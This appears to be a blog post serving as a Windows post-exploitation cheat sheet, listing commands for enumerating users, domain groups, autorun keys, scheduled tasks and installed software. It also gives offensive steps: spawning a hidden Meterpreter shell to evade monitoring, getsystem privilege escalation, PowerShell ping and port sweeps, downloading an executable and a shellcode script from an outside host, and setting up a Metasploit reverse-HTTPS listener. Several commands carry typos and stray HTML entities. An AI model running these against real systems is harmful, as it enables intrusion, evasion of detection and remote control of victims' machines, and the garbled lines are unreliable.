windows.everything

================================= Manual WIN Enumeration

Pop a shell w/o a banner to bypass most security monitoring tools.

execute -c -H -f cmd -a “/k” -i

============= Basics

net view
net view /domain
net user
net user /domain
net localgroup
net localgroup /domain
net localgroup administrators
net localgroup administrators /domain
net group “Domain Users” /domain
net group “Domain Admins” /domain
net user “SomeUser” /domain

echo %logonserver:*\\=%

============== Environment Stuff
sc query

tasklist /v
tasklist /F /IM “cmd.exe” <<<<<<<< Kill a Process

<<<<<<<<<<<<< List Software Installed
reg query HKLM\Software
reg query HKCU\Software
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion”

fsutil fsinfo drives <<<< List Mounts
reg query HKLM\system\mounteddevices <<<< List Mounts

reg query “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU” <<< Show Recent Commands
reg query “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs” <<< Show Recent Commands

<<<<<<<<<<<<<< Find All AutoRun Processes
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run” /S
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunOnce” /S
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunOnceEx” /S
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunServices” /S
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\RunServicesOnce” /S
reg query “HKLM\Software\Policies\Microsoft\Windows\System\Scripts” /S
reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Policies\Explorer\Run\” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunOnce” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunOnceEx” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunServices” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\RunServicesOnce” /S
reg query “HKCU\Software\Policies\Microsoft\Windows\System\Scripts” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Policies\Explorer\Run\” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\RunMRU” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\RecentDocs” /S
reg query “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU” /S

reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Uninstall” /S
reg query “HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\” /S

============== AutoStart Tasks

at
schtasks.exe /Query /FO LIST /V
type “%SystemDrive%\autoexec.bat”
type “%SystemRoot%\system.ini”
type “%SystemRoot%\winstart.bat”
type “%SystemRoot%\wininit.ini”
dir “%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup”
dir “%SystemRoot%”\Tasks
dir “%UserProfile%\Start Menu\Programs\Startup”
============== Domain Stuff

dsquery user -name *
dsquery user -name * -limit 1000 <<<< Increase limit for our query searches
dsquery group <<<<<<<<<<<< List all Local Groups
dsquery group “<distinguished name>” <<<<<<<<<<<< List all Groups on hostname given
dsquery group -name <group name> | dsget group -members -expand <<<<<<< List all Domain Admin Accounts
dsquery group -name <user name> | dsget user -memberof -expand <<<<< List of a Users other Groups

showgroups domain_name\user_name <<<<<<<< Find out what groups a user is in
showmbrs domain_name\group_name <<<<<<<<<< find all members of a group
dsquery group -name group_name | dsget group -desc <<<< Find out about a group
dsquery user -samid user_name <<<<<<<<<<<<<<<<< Find OU a user account resides on
dsquery computer -name computer_name | dsget computer -memberof <<<< Find OU a computer account resides on
dsquery ” -filter “(&(objectcategory=gropu)(objectclass=group)(name=HR))” -limit 0 -attr * <<<<<<<<<<< query a group (ex: HR)

Batch file to Enum Group Members
——————————–
@echo off
if exist membership.txt del membership.txt
dsquery group >groups.txt
::The FOR command is one single line
for /f “tokens=*” %%g in (groups.txt) do @echo %%g >> membership.txt && echo Members: >>membership.txt && dsget group

=================================== Enumerate with POWERSHEL

Example
powershell -command “& {&’Import-Module’ AppLocker}”; “&{&’Set-AppLockerPolicy’ -XmlPolicy myXmlFilePath.xml}”

getsystem
shell
cd c:\Users\Administrator.SomePlace

==== Ping Sweep
powershell -command “1..255 | % {\””192.168.0.$($_): $(Test-Connection -count 1 -comp 192.168.0.$($_) -quient)\””}”

==== Port 445 Sweep
powershell -command “1..255 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\””192.168.0.$_\””,445)) \”192.168.0.$_\””} 2>$null”

==== Simple Port Scan
powershell -command “1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\””192.168.0.XX\””,$_)) \””$_ is open\””} 2>$null”

==== Download a File
powershell -command “(New-Object System.Net.WebClient).DownloadFile(‘http://my.website.com/somefile.exe&#8217;, ‘somefile.exe’)”

==== Text File to STDOUT local file
(New-ObjectSystem.Net.WebClient).DownloadString(“http://my.website.com/invoke.shellcode.ps1&#8221;) | Out-File -Encoding ASCII Invoke

====== Quick MSF Listener to connect back to
msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST my.ip.address
set LPORT 443

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s